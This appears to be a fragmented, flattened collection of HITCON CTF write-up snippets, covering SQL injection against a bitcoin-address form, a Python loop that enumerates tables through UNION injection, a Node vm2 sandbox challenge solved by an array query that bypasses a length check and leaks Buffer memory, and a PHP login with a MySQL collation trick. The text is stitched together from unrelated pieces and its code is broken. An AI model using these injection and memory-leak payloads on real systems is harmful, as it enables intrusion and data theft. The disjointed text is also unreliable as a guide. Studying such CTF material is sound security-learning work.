address=18AfZLTCK1ZByGLjbthXLKsZfcqy9N8Kjf' union select '1FeexV6bAHb8ybZjqQMjJrcCrHGW9sb6uF' limit 1,1#&flag_id=flag1&submit=
get
hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}
Well done! Aww yeah, you successfully read this important message. Thank you for buying flag. Here's your flag: Flag2 is: hitcon{u51n6_07h3r_6uy5_b17c0n_70_byp455_ch3ck1n6_15_fun!!}
# Writeup snippet, flattened onto one line by extraction: the original line breaks and
# indentation of the loop body, and the request that actually sends `data`, are not
# shown here. For i in 0..99 it builds an `address` value that closes the quoted
# literal and appends a UNION ALL on information_schema.tables with LIMIT i,1, so each
# request reads back a single table name; it prints that value and assembles the
# flag2 form fields. NOTE(review): this only works where `address` reaches the SQL
# text unescaped -- a parameterised query leaves the appended text inert.
for i in range(0, 100): address = r"d' AND 1=2 UNION ALL SELECT table_name from information_schema.tables LIMIT {},1 #".format(str(i)) print(address) data = {'address': address, 'flag_id': 'flag2', 'submit': 1}
var randomstring = require("randomstring"); var express = require("express"); var {VM} = require("vm2"); var fs = require("fs");
// Express application instance, plus the flag value read from the local config module.
const app = express();
const { flag } = require("./config.js");
// GET /: when a short `data` query value is present, evaluates it inside a vm2 sandbox
// and returns the result; otherwise returns this file's own source as plain text.
// NOTE(review): the `length <= 12` bound only limits the string case. Express's query
// parser also produces arrays (`data[]=...`), whose `length` counts elements rather
// than characters, so the limit is only meaningful together with a
// `typeof req.query.data === "string"` check.
app.get("/", function (req, res) {
  res.header("Content-Type", "text/plain");
  /* Orange is so kind so he put the flag here. But if you can guess correctly :P */
  // Direct eval in sloppy mode: declares a function-scoped variable whose name carries
  // a random 64-character suffix and whose value is the wrapped flag.
  eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";");
  const payload = req.query.data;
  const canRun = Boolean(payload) && payload.length <= 12;
  if (!canRun) {
    res.send(fs.readFileSync(__filename).toString());
    return;
  }
  const sandbox = new VM({ timeout: 1000 });
  console.log(payload);
  res.send("eval ->" + sandbox.run(payload));
});
app.listen(3000, function () { console.log("listening on port 3000!");
http://52.198.115.130:3000/?data[]=for (varstep = 0; step < 100000; step++) {var buf = (new Buffer(100)).toString('ascii');if (buf.indexOf("hitcon{") !== -1) {break;}}buf; flag: hitcon{4nother h34rtbleed in n0dejs? ordo u solved by other way?}
from flask import Response from flask import request, session from flask import redirect, url_for, safe_join, abort from flask import render_template_string
// Builds the login query by formatting $username and $password straight into the SQL
// text with sprintf (no escaping happens on this line; anything guarding against
// injection would have to run before it), then dumps the resulting query.
$sql = sprintf("SELECT * FROM users WHERE username='%s' AND password='%s'", $username, $password); var_dump($sql);
// Guard against logging in as "orange": both tests are loose comparisons, and the
// second only asks whether the literal substring "orange" occurs anywhere in the
// query text. NOTE(review): filtering the query string does not constrain what the
// database itself treats as equal to 'orange' under the column's collation -- see
// the utf8_general_ci / utf8_unicode_ci note later on this page.
if ( $username == 'orange' || stripos($sql, 'orange') != false ) { $this->__die("Orange is so shy. He do not want to see you."); }
// Runs the query; the flag is returned whenever a row comes back whose role is
// 'admin' ($obj != false is again a loose comparison). The trailing brace closes the
// enclosing method, whose signature is not part of this excerpt.
$obj = $this->__query($sql); if ( $obj != false && $obj->role == 'admin' ) { $this->__die("Hi, Orange! Here is your flag: " . $FLAG); } else { $this->__die("Admin only!"); } }
// Emits this file's own source with syntax highlighting (the "view source" endpoint).
function source() {
    highlight_file(__FILE__);
}
function__conn(){ global $db_host, $db_name, $db_user, $db_pass, $DEBUG;
if (!$this->conn) $this->conn = mysql_connect($db_host, $db_user, $db_pass);
mysql_select_db($db_name, $this->conn);
if ($DEBUG) { $sql = "CREATE TABLE IF NOT EXISTS users ( username VARCHAR(64), password VARCHAR(64), role VARCHAR(64) ) CHARACTER SET utf8"; $this->__query($sql, $back=false);
if ( $username == 'orange' || stripos($sql, 'orange') != false ) { $this->__die("Orange is so shy. He do not want to see you."); }
这里开始一直没有想法,但是后来看到了这个
MySQL 中 utf8_unicode_ci 和 utf8_general_ci 两种编码格式：utf8_general_ci 不区分大小写，Ä = A、Ö = O、Ü = U 这三个等式都成立；在 utf8_general_ci 下 ß = s 成立，但在 utf8_unicode_ci 下才有 ß = ss。